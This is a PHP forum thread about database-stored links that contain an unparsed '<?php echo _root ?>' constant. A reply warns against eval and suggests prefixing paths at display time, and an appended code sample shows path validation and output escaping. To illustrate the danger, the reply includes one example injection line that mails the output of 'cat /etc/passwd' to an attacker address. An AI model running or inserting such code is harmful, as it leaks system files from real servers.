Schalk wrote:

Greetings All,

I have the following problem. I load certain links and breadcrumbs from
the database into an external .php file which I include on various pages
within the site. Due to this I have defined a constant '_root' and
precede all links with this to ensure that the links will work no matter
from where inside the site structure they are called.

My problem is this: when I load these links from the database into the
external .php file and then load the page that includes this, the line
<?php echo _root ?> is not parsed and shows up in the links, for example:
/our_work/<?php echo _root ?>/our_work/index.php when it should be
/site_root/our_work/index.php

How can I ensure that these calls to <?php echo _root ?> are parsed
before being sent to the browser?

Why do you need to store _root in the data? Wouldn't it be better to
take it out and then prefix it before displaying? No complications then.

You're attempting to convert text into php code - make sure you sanitize
*all* of your data extremely carefully.

In theory I could have
<?php mail('hacker@xxxxxxxxxx', 'blah', `cat /etc/passwd`); ?>
type code in there and it would execute it.

eval should do it but you have been warned (see many threads in the past
about why eval is bad).

--
Postgresql & php tutorials
http://www.designmagick.com/
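
The reply's suggestion (store the path without _root and prefix it at display time, so nothing from the database is ever evaluated as PHP), as an added example that is not part of the original thread. The sample rows and the site_href() helper are constructed for illustration, and the code assumes _root is defined in a shared include and PHP 7.1 or later.

```php
<?php
// Assumption: _root is defined once in a shared config include, as in the question.
define('_root', '/site_root');

// Constructed sample rows standing in for the links/breadcrumbs table.
// Paths are stored site-relative, with no PHP code embedded in the data.
$rows = [
    ['label' => 'Our work',       'path' => '/our_work/index.php'],
    ['label' => 'Contact & info', 'path' => '/contact/index.php'],
    // A legacy row that still carries embedded PHP text; it must not be rendered.
    ['label' => 'Legacy row',     'path' => '<?php echo _root ?>/our_work/index.php'],
];

/**
 * Hypothetical helper: turn a stored site-relative path into a full href.
 * Returns null when the stored value is not a plain path.
 */
function site_href(string $path): ?string
{
    // Accept only a leading slash followed by path-safe characters.
    if (!preg_match('#^/[A-Za-z0-9_./-]*\z#', $path)) {
        return null;
    }
    // Refuse parent-directory segments.
    if (preg_match('#(^|/)\.\.(/|\z)#', $path)) {
        return null;
    }
    return rtrim(_root, '/') . $path;
}

foreach ($rows as $row) {
    $href = site_href($row['path']);
    if ($href === null) {
        // Stored data is treated as data only: a bad row is skipped and logged.
        error_log('Skipping link with unexpected path: ' . $row['label']);
        continue;
    }
    // Escape on output so labels and paths cannot break out of the markup.
    printf(
        "<a href=\"%s\">%s</a>\n",
        htmlspecialchars($href, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($row['label'], ENT_QUOTES, 'UTF-8')
    );
}
```

The first two rows render as links under /site_root; the legacy row is rejected by the path check and never reaches the page or an eval() call.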